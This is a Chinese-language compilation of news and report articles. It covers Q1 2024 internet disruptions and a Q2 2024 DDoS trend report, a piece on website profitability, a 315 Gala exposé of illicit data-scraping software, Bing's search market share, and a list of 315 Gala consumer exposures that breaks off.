日观察到AS36998 (Zain Sudan / SDN Mobitel)发生类似的下降。MTN Sudan 的中断符合该提供商发布的社交媒体帖子,其中表示(译文) “我们对由于不可抗力导致的所有服务中断表示遗憾。在我们为此次中断造成的不便向您道歉的同时,我们保证将尽快恢复服务,并将在服务恢复时通知您。” 2 月 5 日,即中断开始几天后,Zain Sudan 发布社交媒体帖子称(译文) “Zain Sudan 一直在努力维持通信和互联网服务,以服务于我们的重要用户。我们希望指出,当前的网络中断是不受我们控制的原因造成的,我们希望安全至上,且服务将尽快恢复。” Sudatel 没有就其网络状态发布任何消息。2 月 4 日,Digital Rights Lab - Sudan 在社交媒体发帖称 “我们的消息来源证实@RSFSudan部队接管了苏丹喀土穆的 ISP 数据中心。” 在这些提供商观察到的互联网中断可能与以上接管有关,这是 2023 年 4 月 15 日以来该国持续至今的军事冲突的一部分。 这些网络的中断时间长短各异。 Sudatel 的流量在 2 月 11 日开始恢复。Zain Sudan 的流量在 3 月 3 日开始恢复,符合一篇社交媒体帖子所称(译文) “Zain 网络正在逐步恢复工作,并允许其用户在有限的时间内免费通讯。Zain 承诺将继续努力恢复在其他各州的网络。” 到第一季度末,MTN Sudan 的流量尚未恢复。 乌克兰 今年 2 月,乌克兰/俄罗斯冲突已经持续了两年,在此期间我们报告了乌克兰境内因冲突相关事件造成的多起互联网中断事件。 2 月 22 日,乌克兰几处能源设施被破坏,导致大范围停电。这些停电导致乌克兰多个地区的互联网中断,包括哈尔科夫、扎波罗热、敖德萨、第聂伯罗彼得罗夫斯克州和赫梅利尼茨基州。流量最初下降发生在当地时间 05:00 (03:00 UTC) 左右,哈尔科夫的流量下降幅度高达 68%。然而与前一周相比,所有地区的流量水平在几天内均有所下降。 加沙地带 在我们的2023 年第四季度互联网中断事件概要博客文章中,我们提到,在 10 月、11 月和 12 月期间,Paltel (巴勒斯坦电信公司)在社交媒体上发布了几篇关于其固定电话、移动电话和互联网服务中断的帖子。在 2024 年第一季度期间,我们在1 月 12 日、1 月 22 日和3 月 5 日观察到类似的中断。 Paltel 将这些中断归因于与以色列之间的冲突有关的持续攻击。该季度期间的相关中断持续时间长短不一,介乎仅几个小时到一周以上不等。 下图展示每次中断,包括 Paltel 在加沙地带四个巴勒斯坦省份的流量。 虽然加沙省的流量似乎发生了中断,但网络连接仍然可用,而在汗尤尼斯省、拉法省和迪尔巴勒赫省则发生了完全的中断。 1 月 12-19 日 1 月 22-24 日 3 月 5 日 网络攻击 除了前面讨论过的,在 1 月 11 日影响了AS327802 (Moov Africa Tchad / Millicom)的网络攻击外,第一季度期间还观察到另外几起由网络攻击引起的互联网中断。 HotNet Internet Services(以色列) Anonymous Sudan 据称对 AS12849 (HotNet 互联网服务) ——一家主要以色列电信服务提供商——发动了一场攻击。 这次攻击显然很短暂,仅在当地时间 2 月 20 日 22:00 至 2 月 21 日 00:00 (2 月 20 日 20:00-22:00 UTC)导致流量中断。攻击发生期间,HotNet 公告的 IPv4 和 IPv6 地址空间数量下降至零。 Zain Bahrain Anonymous Sudan据称也对AS31452 (Zain Bahrain)发动了一次网络攻击。这次攻击的严重程度似乎低于针对以色列 HotNet 的那次,但持续时间明显更长,流量在当地时间 3 月 3 日 20:45 至 3 月 4 日 18:15(3 月 3 日 17:45 至 3 月 4 日 15:15 UTC)发生中断。没有观察到公告 IP 地址空间的影响。 Zain Bahrain 在3 月 4 日发布的社交媒体帖子中承认了连接中断,并指出(译文) “我们希望通知您,一些客户在使用我们部分服务时可能会遇到困难。我们的技术团队正在尽快解决这些困难。” 乌克兰的多个网络 3 月 13 日,乌克兰多家电信提供商遭到攻击,包括AS16066 (Triangulum)、AS34359 (Link Telecom Ukraine)、AS197522 (Kalush Information Network)、AS52074 (Mandarun)和AS29013 (LinkKremen)。 Triangulum 似乎受到最严重的影响,在 3 月 13 日至 20 日期间流量几乎完全消失,如下图所示。 Triangulum 在其网站上发布通知称, “ 2024 年 3 月 13 日,乌克兰的多家提供商遭到了一次黑客攻击。 2024 年 3 月 13 日上午 10:28,我公司的网络发生大规模技术故障,导致无法提供电子通信服务。公司员工与网络警察和国家网络安全协调中心的员工一起,日以继夜地采取综合性措施,旨在尽快恢复全部服务。服务正在逐步恢复。完全恢复可能需要几天时间。 ” 其他受影响的提供商经历的连接中断时间相对较短。Mandarun 的几乎完全中断持续了大约一天,而其他提供商的中断持续了大约七个小时,从当地时间 3 月 13 日11:30(09:30 UTC)左右开始,连接在3 月 14 日当地时间08:00(06:00 UTC)恢复到正常水平。 政府指令 科摩罗 在阿扎利·阿苏马尼总统再次当选后的抗议活动中,科摩罗当局据称在 1 月 17 日关闭了互联网连接。虽然从 1 月 17 日当地时间 12:00(09:00 UTC)到 1 月 19 日当地时间 17:30(14:30 UTC)期间,在国家层面观察到一定程度的的流量中断,但来自AS36939 (Comores Telecom)的流量中断要明显得多,在这两天内发生了数次几乎完全中断。尽管 Comores Telecom 宣布了有限数量的 IPv4 地址空间,但在 1 月17 日和 18 日期间,数量波动非常大,几次降至零。 Sudatel Senegal/Expresso Telecom 和 Tigo/Free (塞内加尔) 2 月 4 日,塞内加尔通信、电信和数字事务部长下令从当地时间 22:00(22:00 UTC)开始暂停移动互联网连接。此举是在总统选举推迟后爆发抗议活动的背景下采取的。来自AS37196 (Sudatel Senegal/Expresso Telecom)的流量在暂停生效时大幅下降,然后在当地时间 2 月 7 日约 07:30 (07:30 UTC) 恢复。来自AS37649 (Tigo/Free)的流量在当地时间 2 月 5 日约 09:30 (09:30 UTC) 左右下降,该提供商通过社交媒体将暂停一事通知用户。Tigo/Free 上的流量在 2 月 7 日当地时间午夜左右(00:00 UTC )恢复,该提供商再次使用社交媒体通知用户服务可用的消息。 两家提供商的公告 IP 地址空间没有变化,表明移动互联网连接的暂停并非在路由级别进行。 大约一周后的 2 月 13 日,在活动分子团体计划发动游行以抗议总统选举推迟的不满前,塞内加尔政府再次下令暂停移动互联网连接。移动互联网的关闭在 Tigo/Free 上最为明显,该网络在当地时间 10:15 至 19:45(10:15 至 19:45 UTC)期间遭遇了重大中断。 巴基斯坦 据一篇发布的报告,巴基斯坦电信管理局 (PTA) 表示,2 月 8 日公民前往投票站选举新政府期间,互联网服务将保持可用。然而,当天全国选民前往投票站投票时,巴基斯坦当局切断了全国的移动互联网访问,当局称此举是为了在前一日发生的暴力事件后“维持法律与秩序”。这次下令关闭的影响在巴基斯坦多家互联网提供商的网络均可见,包括AS59257 (Zong/CMPak)、AS24499 (Telenor Pakistan)和AS45669 (Jazz/Mobilink),从 7:00 直到 20:00 (02:00 - 15:00 UTC),流量在大约 9 个小时后恢复到预期水平。Internet Society 的一篇 Pulse 博客文章估计,这次关闭使巴基斯坦损失了近 1850 万美元的国内生产总值。 乍得 2 月 28 日至 3 月 7 日期间,在乍得观察到多次互联网中断。第一次中断开始于 2 月 28 日当地时间 10:45,持续到 3 月 1 日当地时间 18:00(2 月 28 日 09:45 至 3 月 1 日 17:00)。在 3 月 3 日、4 日和 7 日也观察到持续几小时的较短中断。这些明显的中断发生在该国的政治暴力事件之后。在 2 月 28 日、3 月 3 日和 3 月 4 日的中断期间,观察到该国网络中的公告 IPv4 地址空间数量显著下降,但不清楚为什么 3 月 7 日没有发生类似的下降。 停电 塔吉克斯坦 根据一份已发布的报告,3 月 1 日塔吉克斯坦发生了一次长达数小时的广泛停电,可能与全国气温接近冰点时电热器的增加使用有关。停电从当地时间 11:00(06:00 UTC)开始,持续了大约三个小时。下图可以看到此次停电对国内互联网流量的影响。尽管电力在当地时间 14:00(09:00 UTC)左右恢复,互联网流量直到第二天当地时间 05:00(3月2日 午夜 UTC)才恢复到预期水平。 尽管停电最常对互联网流量产生最大影响,因为计算机和家庭/办公室路由器会关闭,这次停电似乎也影响了国内的网络基础设施,停电期间,全国各地的公告 IPv4 地址空间总量略有下降。 坦桑尼亚 3 月 4 日坦桑尼亚电力公司 (TANESCO) 在社交媒体上发布关于停电的通知称(译文) “坦桑尼亚电力公司(TANESCO)已通知公众,国家电网系统出现错误导致国内包括桑给巴尔在内的部分地区停电。我们的专家正在继续努力确保电力服务恢复正常状态。本公司就由此造成的任何不便表示歉意。” 停电导致坦桑尼亚互联网连接中断,当地时间 13:30 至 23:0(10:30-20:00 UTC) 流量明显下降。 技术问题 Orange España 网络路由是在一个或更多网络中选择一条路径的过程, 在互联网上,路由依赖于边界网关协议 (BGP)。历史上,BGP 路由信息的交换基于提供商之间的信任,但随着时间的推移,为了防止不良行为者滥用系统,人们开发了各种安全机制,例如资源公钥基础设施 (RPKI)。RPKI 是一种加密方法,用于签署记录,将 BGP 路由公告与正确的来源 AS 编号关联起来。路由起源授权(ROA)记录提供了一种验证方法,以确保 IP 地址块持有者已授权一个AS (自治系统)对该地址块中的一个或多个前缀发起路由。 Cloudflare 多年来发布了多篇博客文章,讨论 RPKI 的重要性及我们提供的支持。 当正确实施和配置时, RPKI 和 ROA 帮助支持路由安全,有效预防例如BGP 劫持等行为。 RIPE NCC (“RIPE”)是五个区域性互联网注册机构 (RIR)之一,负责互联网资源的分配、注册和协调活动。RIPE 的服务区域包括欧洲、中东和中亚。1 月 3 日,一名恶意行为者利用了 RIPE 和AS12479 (Orange España)松懈的账户安全性,用在公共互联网上找到的凭据登录到 Orange España 的 RIPE 账户。控制账户后,攻击者发布了多个带有“伪造”起源的 ROA,使得由 AS12479 发起的数千条路由变成了“RPKI-无效”,这导致拒绝 RPKI-无效路由的运营商停止传输大量 Orange España 的 IP 空间。 由于 Cloudflare 执行 RPKI 验证,我们也拒绝了 RPKI-无效路由。我们本会尝试通过我们前往一些传输提供商的默认路由来连接 Orange España,但因为这些提供商也进行 RPKI 验证,流量也会在这些提供商的网络中被丢弃。因此,从 Cloudflare 的角度看,这次事件导致在当地时间 16:45 至 19:45(14:45 至 17:45 UTC)来自 Orange España 的流量下降,以及来自 AS12479 的公告 IPv4 空间显著减少。 Orange España在社交媒体上证实其 RIPE 帐户遭到不当访问,且由于这一事件,RIPE 已强制要求使用双因素身份验证 (2FA)登录 。关于这一事件的更多见解,Kentik 的 Doug Madory和bgp.tools 的 Ben Cartwright-Cox均发布详细的分析和时间线。 MaxNet(乌克兰) 1 月 11 日,乌克兰 AS34700 (MaxNet)的用户经历了一次持续九小时的互联网中断。最初流量下降发生在当地时间 16:00 (14:00 UTC),并在 1 月 12 日当地时间 01:00(1月11日 23:00 UTC)恢复。该提供商最初的社交媒体帖子解释了中断的原因,并指出(译文) “尊敬的用户:由于公用设施故障导致枢纽站点之一被淹,本城的某些地区可能部分或完全没有服务。我们正在尽最大努力恢复服务,但这需要时间。关于开放时间的进一步信息将在应急工作完成后尽快发布。”后续的一个帖子通知用户互联网连接已经恢复。水淹显然也影响了核心路由基础设施,因为MaxNet 公告的 IPv4 地址空间也在当地时间 16:00 和 22:00 (14:00 - 20:00 UTC) 下降至零。 Plusnet(英国) 1 月 15 日,在英国 AS6871 (Plusnet)观察到的一次流量中断,最初被该提供商在社交媒体上回复客户投诉时定性为“大规模中断”。然而,造成中断的根本原因远远没有那么夸张——它显然与其 DNS 服务器的问题有关。由于用户无法使用 Plusnet 默认的 DNS 解析器成功解析主机名,这最终导致了该网络的流量在当地时间(同 UTC 时间)16:00 至 18:00 之间大约两小时内出现下降。对于系统配置为使用第三方 DNS 解析器(例如Cloudflare 的 1.1.1.1 服务)的用户而言,则没有体验到服务中断。 俄罗斯 今年 1 月,DNS 问题也影响了俄罗斯的用户,但不同于英国 Plusnet 所体现的方式。1 月 30 日报告的DNSSEC故障导致 .ru 域名在几个小时内无法访问。(DNSSEC 通过向现有 DNS 记录添加加密签名来创建一个安全的域名系统。通过检查其相关签名,您可以验证请求的 DNS 记录是否来自其权威名称服务器,并且在传输过程中未被篡改,而非中间人攻击中注入的伪造记录。)上述 DNSSEC 验证失败导致针对 .ru 国家代码顶级域 (ccTLD) 中的主机名在 Cloudflare 的 1.1.1.1 解析器进行 DNS 查找的响应为SERVFAIL。 在峰值时,68.4% 的请求收到了 SERVFAIL 响应。 .ru ccTLD 协调中心确认其正在解决“影响与全球 DNSSEC 基础设施相关的 .ru 区域的技术问题”,但没有就问题的根本原因提供任何其他细节,例如 DNSSEC 密钥滚动更新的问题。 2019 年 8 月 16 日, .ru ccTLD 也经历了一次类似的 DNSSEC 相关中断,持续数小时。 AT&T(美国) 2 月 22 日凌晨 04:00 东部时间/03:00 中部时间(09:00 UTC),AT&T 在美国多个城市的用户经历了一次移动服务中断。受影响的城市包括亚特兰大、休斯顿和芝加哥,连接中断时间约为 8 小时。Cloudflare 的数据显示,随着问题的开始, 与前几周相比,AT&T (AS7018)流量在芝加哥下降多达 45%,在达拉斯下降多达 18%。AT&T 发布的“网络更新”称 “根据我们的初步审查,我们认为今天的中断是由于我们在扩展网络时应用和执行了一个错误的进程造成的,而非网络攻击。 ” 维护 Vodafone Egypt 3 月 5 日当地时间 05:15 至 11:30(03:15 - 09:30 UTC),AS36935 (Vodafone Egypt)的客户经历了移动互联网连接中断,来自该网络的流量下降比预期水平低多达 70%。该提供商发布的社交媒体帖子称(译文) “由于今天上午进行的更新,一些地区的 4G 服务运行受到影响,我们表示歉意。”由于 4G 网络故障,Vodafone 需要向受影响的客户提供赔偿,并被埃及国家电信监管局(NTRA) 处予罚款。 Ocean Wave Communication(缅甸) 3 月 12 日当地时间中午前(05:15 UTC),缅甸消费者光纤和商业互联网服务提供商AS136442 (Ocean Wave)上观察到的流量显著下降。该提供商在社交媒体上发布的帖子(译文)称 “Ocean Wave 客户请注意,由于网络维护,将没有互联网连接/连接缓慢。” 连接中断持续了大约 7 个小时,流量在当地时间 19:00 前(12:15 UTC)恢复到正常水平。 总结 今年第一季度发生了两起值得注意的海底电缆损坏,再次凸显了保护海底电缆的重要性,以及它们穿越或靠近地缘政治敏感区域的相关风险。鉴于对海底电缆传输互联网流量的依赖,这将在未来多年继续成为一个问题。 Orange España 事件还表明了通过多因素身份验证保护对重要运营资源的重要性。 Cloudflare 过去曾撰写过有关此主题的文章 。像 RIPE 这样的组织在互联网的运作中扮演着至关重要的幕后角色,因而要求他们采取所有切实的预防措施来保护他们的系统,以防止恶意行为者采取可能广泛中断互联网连接的行动。 #### 2024 年第二季度 DDoS 威胁趋势报告:中国是最大的被攻击国 阿根廷为最大攻击来源国 欢迎阅读第 18 版 Cloudflare DDoS 威胁趋势报告。本报告每季度发布一次,对Cloudflare 网络上观察到的最新 DDoS 威胁态势进行深入分析。此版报告将重点介绍 2024 年第二季度的相关情况。 Cloudflare 凭借覆盖全球 320 多个城市、容量达 280 TB/秒的庞大网络(为 19% 的网站提供服务)占据有利条件,使其能够向更广泛的互联网社群提供宝贵的洞察见解和趋势分析。 2024 年第二季度的关键洞察及见解 Cloudflare 记录的 DDoS 攻击数量同比增长 20%。 每 25 名受访者中有 1 人表示,其遭受的 DDoS 攻击由代表国家或政府支持的威胁行为者发起。 威胁行为者的能力达到空前的高水平,Cloudflare 的自动化防御系统生成了 10 倍以上的攻击特征,以抵御和缓解超级复杂的 DDoS 攻击。 在深入探讨之前,我们回顾一下什么是 DDoS 攻击。分布式拒绝服务 (DDoS)攻击是一种网络攻击,目的是切断或破坏互联网服务(例如网站或移动应用程序),使用户无法使用这些服务。通常采用的攻击方式是使受害者的服务器不堪重负,无法处理过多流量,这些流量通常来自互联网上的多个源,进而导致服务器无法处理合法用户流量。 DDoS 攻击示意图 2024 年上半年,Cloudflare 缓解了 850 万次 DDoS 攻击:第一季度 450 万次,第二季度 400 万次。总体而言,第二季度 DDoS 攻击数量环比下降了 11%,但同比增长了 20%。 DDoS 攻击分布(按类型和手段) 需要指出的是,2023 年全年,Cloudflare 缓解了 1400 万次 DDoS 攻击;相比之下,我们到 2024 年年中缓解的 DDoS 攻击数量已达到了去年总量的 60%。 Cloudflare 已成功缓解了 10.2 万亿次 HTTP DDoS 请求和 57 PB 的网络层 DDoS 攻击流量,阻止其到达我们客户的源服务器。 2024 年第二季度 DDoS 攻击数量统计数据 如果进一步细分,则可以看到第二季度 400 万次 DDoS 攻击包括 220 万次网络层 DDoS 攻击,以及 180 万次 HTTP DDoS 攻击。这个 180 万次 HTTP DDoS 攻击的数字经过了标准化处理,以弥补复杂和随机 HTTP DDoS 攻击数量激增的问题。Cloudflare 的自动化防御系统生成了针对 DDoS 攻击的实时特征,并且由于这些复杂攻击的随机性,我们观察到单次攻击生成了许多特征 - 实际生成的特征数量接近 1900 万,比 180 万这个标准化处理后的数字高出十倍以上。为应对因随机攻击所生成的数百万个特征,均源于一些单一的规则。这些规则发挥了拦截攻击的作用,但它们也导致特征数量虚高,因此,我们在计算时将其排除在外。 HTTP DDoS 攻击数量(按季节),含已排除的攻击特征 这种十倍数量的差异表明,威胁态势已发生巨大变化。过去,使威胁行为者能够发起此类随机、复杂攻击的工具和能力,与代表国家或政府支持的行为者的能力息息相关。但是,随着生成式 AI 和自动驾驶系统的兴起,使得威胁行为者可以借势更快速地编写更优质的代码,甚至一些“普通网络犯罪分子”也掌握了这些能力。 DDoS 勒索攻击 2024 年 5 月,报告遭受 DDoS 攻击威胁行为者的威胁或DDoS 勒索攻击的 Cloudflare 客户比例达到 16%,为过去 12 个月以来的最高水平。第二季度初期的比例相对较低,7% 的客户报告遭受了威胁或勒索攻击。5 月,这一比例迅速跃升至 16%;6 月则略微下降至 14%。 报告遭受 DDoS 威胁或勒索敲诈的客户百分比(按月份) 总体而言,勒索 DDoS 攻击在过去一年里呈季度环比增加。2024 年第二季度报告遭受威胁或勒索的客户比例为 12.3%,略高于上一季度 (10.2%),但与去年同期基本持平,也是 12.0%。 报告遭受 DDoS 威胁或勒索敲诈的客户百分比(按季度) 威胁行为者 75% 的受访者表示,他们不知道攻击者是谁,或对方发起攻击的原因。这些受访者都是遭受 HTTP DDoS 攻击的 Cloudflare 客户。 在声称了解攻击者的受访者中,59% 的人表示攻击者是竞争对手。另有 21% 的受访者表示,DDoS 攻击由心怀不满的客户或用户发起;另有 17% 的受访者表示,DDoS 攻击由代表国家或政府支持的威胁行为者发起。剩余 3% 的受访者则表示他们遭受了“因其自身原因”造成的 DDoS 攻击。 Cloudflare 客户报告的威胁行为者类型百分比,不包括未知攻击者和异常值 遭受攻击最多的国家和地区 中国位居 2024 年第二季度全球遭受攻击最多的国家和地区榜首。这个排名纳入考虑的攻击类型包括:HTTP DDoS 攻击、网络层 DDoS 攻击、DDoS 攻击流量占总流量的总量和百分比,并且图表显示了每个国家或地区的总体 DDoS 攻击活动。图表中的条形图越长,表示攻击活动数量越多。 紧随中国之后是位居第二的土耳其,接着依次是新加坡、中国香港、俄罗斯、巴西和泰国。下表列出了遭受攻击最多的前 15 个国家/地区中的其余国家和地区。 2024 年第二季度遭受攻击最多的 15 个国家和地区 受攻击最多的行业 信息技术和服务位居 2024 年第二季度遭受攻击最多的目标行业榜首。我们在此处使用的排名方法遵循前面所述的相同原则,即:将 HTTP DDoS 攻击和网络层 DDoS 攻击的总量与相对攻击流量提炼为一个 DDoS 攻击活动排名。 电信、服务提供商和运营商行业排第二,消费品行业则排在第三。 2024 年第二季度遭受攻击最多的 15 个目标行业 如果仅分析 HTTP DDoS 攻击,我们会看到截然不同的情况。就 HTTP DDoS 攻击请求量而言,游戏和泛娱乐是遭受攻击最多的行业。各个地区的细分数据如下所示。 遭受 HTTP DDoS 攻击最多的行业(按地区划分) DDoS 攻击最大来源 阿根廷位居 2024 年第二季度 DDoS 攻击最大来源榜首。我们在此处使用的排名方法遵循前面所述的相同原则,即:将 HTTP DDoS 攻击和网络层 DDoS 攻击的总量与相对攻击流量提炼为一个 DDoS 攻击活动排名。 印度尼西亚紧随其后,排名第二;荷兰排名第三。 2024 年第二季度排名前 15 的 DDoS 攻击最大来源 DDoS 攻击特征 网络层 DDoS 攻击手段 虽然基于 DNS 的 DDoS 攻击数量季度环比减少了 49%,但它仍然是最常见的攻击手段,其中DNS 洪水和DNS 放大攻击合计占 37%。SYN 洪水次之,占 23%;随后是 RST 洪水,占 10% 多一点。SYN 洪水与 RST 洪水都是基于 TCP 的 DDoS 攻击。所有基于 TCP 的 DDoS 攻击数量总共占网络层 DDoS 攻击总数的 38%。 主要攻击手段(网络层) HTTP DDoS 攻击手段 运营大型网络的优势之一是我们可以发现许多流量和攻击。这有助于我们优化检测和缓解系统来更好、更有效地保护客户。Cloudflare 在第一季度使用针对自身已知僵尸网络的专有启发式方法缓解了一半数量的HTTP DDoS 攻击。这些启发式方法会指导我们的系统如何生成实时特征来匹配不同类型的攻击。 另有 29% 的 HTTP DDoS 攻击使用了虚假用户代理、冒充浏览器,或来自无头浏览器。另有 13% 的攻击具备可疑的 HTTP 属性,触发了我们的自动化防御系统;以及 7% 的攻击被标记为一般洪水。需要注意的一点是,这些攻击手段或攻击组织不一定具有排他性。例如,已知的僵尸网络也会冒充浏览器以及具备可疑的 HTTP 属性,但这是我们对 HTTP DDoS 攻击进行分类的初步尝试。 主要攻击手段 (HTTP) ·DDoS 攻击中使用的 HTTP 版本 在第二季度,大约一半的 Web 流量使用 HTTP/2,29% 使用 HTTP/1.1,五分之一使用 HTTP/3,接近 0.62% 使用 HTTP/1.0,0.01% 使用 HTTP/1.2。 Web 流量分布(按 HTTP 版本) HTTP DDoS 攻击在版本采用方面遵循类似的模式,尽管也是更倾向于使用 HTTP/2。76% 的 HTTP DDoS 攻击流量使用 HTTP/2 版本,接近 22% 的流量使用 HTTP/1.1。另一方面,HTTP/3 的使用量相对要少得多。只有 0.86% 的 HTTP DDoS 攻击流量使用 HTTP/3,与此形成鲜明对比的是,20% 的 Web 流量采用 HTTP/3。 HTTP DDoS 攻击流量分布(按 HTTP 版本) ·DDoS 攻击持续时间 绝大多数 DDoS 攻击的持续时间比较短。超过 57% 的 HTTP DDoS 攻击以及 88% 的网络层 DDoS 攻击在 10 分钟内结束。这凸显了对自动化内联检测和缓解系统的需求。因为如果靠人为来响应警报、分析流量,以及应用手动缓解措施,十分钟远远不够。 在图表的另一端,我们可以看到,大约四分之一的 HTTP DDoS 攻击持续时间超过一小时,近五分之一的攻击持续时间超过一天。而持续时间较长的网络层 DDoS 攻击数量明显减少,只有 1% 的网络层 DDoS 攻击持续时间超过 3 小时。 HTTP DDoS 攻击分布(按持续时间) 网络层 DDoS 攻击:持续时间分布 DDoS 攻击规模 大多数 DDoS 攻击规模相对较小。超过 95% 的网络层 DDoS 攻击低于 500 兆比特/秒,86% 的网络层 DDoS 攻击低于 50,000 个数据包/秒。 网络层 DDoS 攻击分布(按比特率) 网络层 DDoS 攻击分布(按包速率) 同样地,81% 的 HTTP DDoS 攻击低于每秒 5 万个请求。虽然这些速率在 Cloudflare 的网络规模上显得很小,但是对于不习惯这种流量水平的未受保护网站而言,此类攻击仍然可能会造成破坏性影响。 HTTP DDoS 攻击分布(按请求速率) 尽管大多数攻击规模较小,但较大型的容量耗尽攻击的数量有所增加。每 100 次网络层 DDoS 攻击中,有一次超过 100 万个数据包/秒 (pps);每 100 次网络层 DDoS 攻击中,有两次超过 500 兆比特/秒。在第 7 层(应用程序层),每 1000 次 HTTP DDoS 攻击中,有 4 次超过每秒 100 万个请求。 #### 2024年还能做网站吗?网站好赚钱吗 2024年网站建设与盈利前景 在2024年,建设网站仍然是一个可行的业务选择。随着互联网技术的不断发展和用户习惯的逐渐成熟,网站作为信息展示和服务交互的平台,其重要性并未减弱。网站可以通过多种方式实现盈利,例如通过广告联盟、联盟营销、出售产品或服务、内容变现等。成功的案例表明,只要有足够的流量和合适的变现策略,网站依然能够带来可观的收入。 网站盈利方式 网站的盈利方式多种多样,包括但不限于以下几种: 广告联盟:通过谷歌、百度等广告联盟在网站上展示广告,根据点击或展示次数获得收入。 联盟营销:推荐相关产品或服务,并通过追踪链接获得销售佣金。 出售产品或服务:直接在网站上销售自己的产品或提供服务。 内容变现:通过创造有价值的内容吸引用户,然后通过短链接生成器、出售广告位、背书性文章等方式变现。 流量变现:对于日访问量较高的网站,可以通过多种方式将流量转化为收益,例如出售广告位、合作推广等。 网站建设成本 建设一个网站的成本取决于多种因素,包括网站的规模、设计复杂度、功能需求、内容管理系统等。一个简单的个人博客或小型企业网站可能只需要几百到几千元,而一个具有复杂功能和高度定制设计的大型商业网站可能需要几万甚至几十万的投资。 成功案例与流量变现 互联网上有许多成功的网站经营案例,这些案例通常涉及到精心策划的内容营销、搜索引擎优化、社交媒体推广等策略,以增加网站流量并实现变现。例如,一些网站通过提供独特的内容或服务,吸引了大量的用户群体,进而通过广告、会员服务、产品销售等方式实现盈利。 结论 即使在2024年,网站依然是一个有潜力的在线业务平台。通过选择合适的盈利模式、控制建设成本、提高网站流量和用户参与度,网站可以成为一个盈利的项目。然而,成功经营一个网站需要时间、精力和正确的策略,因此,对于有意进入这一领域的人来说,了解市场趋势、用户需求和最佳实践是非常重要的。 #### 2025 年 315 晚会曝光互联网灰色地带“精准获客”大数据软件,利用爬虫技术偷取消费者个人信息 3 月 15 日消息,在目前正在进行的 2025 年 315 晚会中,官方曝光了互联网市场上存在的“精准获客”灰色地带,相应广告声称商家可以通过一种“大数据获客软件”精准获取海量目标人群的消费习惯、手机号码等信息。 ▲ 图源央视新闻(下同) 根据推销信息,315 晚会记者找到了一些公司。在云企智能科技有限公司,工作人员说,他们的获客软件能够将商家想要的关键词设为标签,软件会自动在选择的短视频平台上扫描评论区,一旦发现与标签词相关的评论,就会强行抓取这个用户的电话、微信账号等信息。 此外,这款获客软件还能帮助商家监控和偷取自己同行的直播带货数据,去对方的直播间“截流和引流”。在绿信科技有限公司,技术人员告诉记者,他们的这些软件都是用爬虫技术,偷取消费者个人信息。 在宣称“拥有 20 亿条精准人群画像”的企腾网络技术有限公司,工作人员告诉记者,他们的获客软件名为“火眼云”,已经卖给了很多企业:“像土巴兔之类的,口腔现在有一个拜博,医美的比如说美莱”。此外,工作人员介绍,“火眼云”还可以偷取企业公众号的关注用户或微信群成员的手机号码,只要点击阅读过、转发过企业公众号文章的用户手机号码也会被偷取。 在调查过程中,知情人还告诉记者,市场上现在最厉害的“获客”公司,不仅仅是在互联网上偷数据,还能使用手机的三网通信大数据进行获客。在一份宣传资料上记者看到,这家公司将个人用户分为 9 种类型,个人标签达到 3800 项,网站 2 亿多个,互联网品牌 6 万个,每日处理数据量达到了 100 亿条。 启科科技有限公司的工作人员介绍,他们的“三网大数据”,是指三家电信运营商的数据。一番核对后,记者发现启科科技通过运营商大数据偷取到的个人数据信息,都是真实无误的。工作人员告诉记者,他们是通过“精准通客户管理平台”,上面显示的正是某电信运营商后台的实时数据。就这样,通过这款软件,海量用户信息都被这成百上千的数字标签打上了记号,成为待售的商品。 #### 2025 年搜索引擎市场大变局:微软必应份额升至 12.21%,谷歌下滑 5 月 4 日最新消息,根据权威数据机构 Statista 的统计,搜索引擎市场格局正发生显著变化。在 2020 年,微软 Bing 在搜索引擎市场中仅能处理约十六分之一的搜索请求,市场份额仅为 6.14% ,而谷歌搜索则以 87% 的绝对优势占据主导地位。然而到了 2025 年 3 月,Bing 的市场份额已大幅提升至 12.21%,谷歌搜索的市场份额则下滑至 79.10%,两者差距进一步缩小。​ 回顾 2020 - 2025 年 3 月期间,Bing 的市场份额增长轨迹清晰可见。2020 年,Bing 平均市场份额为 6.14%;2021 年稳步增长至 6.45%;2022 年迎来首次大幅增长,达到 8.65%;2023 年基本保持稳定,为 8.67%;2024 年再次实现显著增长,攀升至 11.32%;直至 2025 年 3 月,其市场份额进一步提升至 12.21% ,呈现出强劲的上升态势。​ 聚焦 2024 年 1 月 - 2025 年 3 月这一时间段,Bing 与谷歌的市场份额变化对比更为明显。谷歌的市场份额从 81.95% 下降至 79.10%,减少了 2.85 个百分点;而 Bing 的市场份额则从 10.51% 增长至 12.21%,实现了 1.7 个百分点的增长。​ Bing 市场份额的持续增长并非偶然,背后有着多方面的原因。在产品推广层面,微软充分利用 Edge 浏览器和 Windows 11 系统的庞大用户基数,加大对 Bing 的推广力度,在广告投放上精准发力,同时不断优化用户体验。在搜索质量方面,Bing 取得了显著突破,无论是技术帮助、新闻资讯,还是在线购物、本地服务以及各类随机知识等常见查询领域,都能提供更准确、多样化的搜索结果。值得一提的是,Bing 与 Copilot 的深度结合,更是为用户带来了全新的搜索体验,进一步增强了用户粘性。​ 不过,尽管 Bing 成绩斐然,但想要撼动谷歌在搜索引擎市场的垄断地位,仍面临诸多挑战。未来,Bing 需要持续提升搜索质量,不断优化用户体验,加大在技术创新方面的投入。同时,微软也应进一步强化 Bing 在其他产品中的整合与推广,拓展用户群体,提升品牌影响力。 #### 2025年央视315晚会总共曝光了哪些问题 2025 年央视 3・15 晚会曝光了六大行业乱象,涉及消费者日常生活的多个领域,具体问题如下: 1. 翻新卫生巾 / 纸尿裤:残次品二次销售,涉嫚熙、全棉时代等品牌 山东梁山希希纸制品公司从正规厂家收购本应销毁的卫生巾、纸尿裤残次品(如 “自由点” 卫生巾、“米菲”“Babycare” 纸尿裤),以 260-1400 元 / 吨的低价购入后,手工挑出 “外观完好” 的 “二等品”,未经消毒直接翻新包装,以七八千元 / 吨的价格销往电商平台。部分网店销量高达 5.7 万件,甚至伪造生产企业信息。剩余垃圾被打碎为原料,回流至生产企业。违规点:违反国标《一次性使用卫生用品卫生标准》,使用废弃品作为原料,生产环境脏乱差。 2. 一次性内裤:徒手制作、材质造假、不灭菌 河南商丘多家企业生产的一次性内裤(涉及 “浪莎”“初医生” 等代加工品牌)存在严重卫生问题: 材质虚假:标注 “纯棉”,实际含涤纶; 生产乱象:工人徒手操作,原料堆放垃圾旁,工作台兼餐桌,喷洒刺激性 “枪水” 去污; 省略灭菌:部分产品未按宣传进行 EO 灭菌,包装标注 “抑菌率 99%” 纯属虚构。健康风险:直接接触可能引发皮肤感染。 3. 啄木鸟维修:“刺客” 式收费,平台施压推高价格 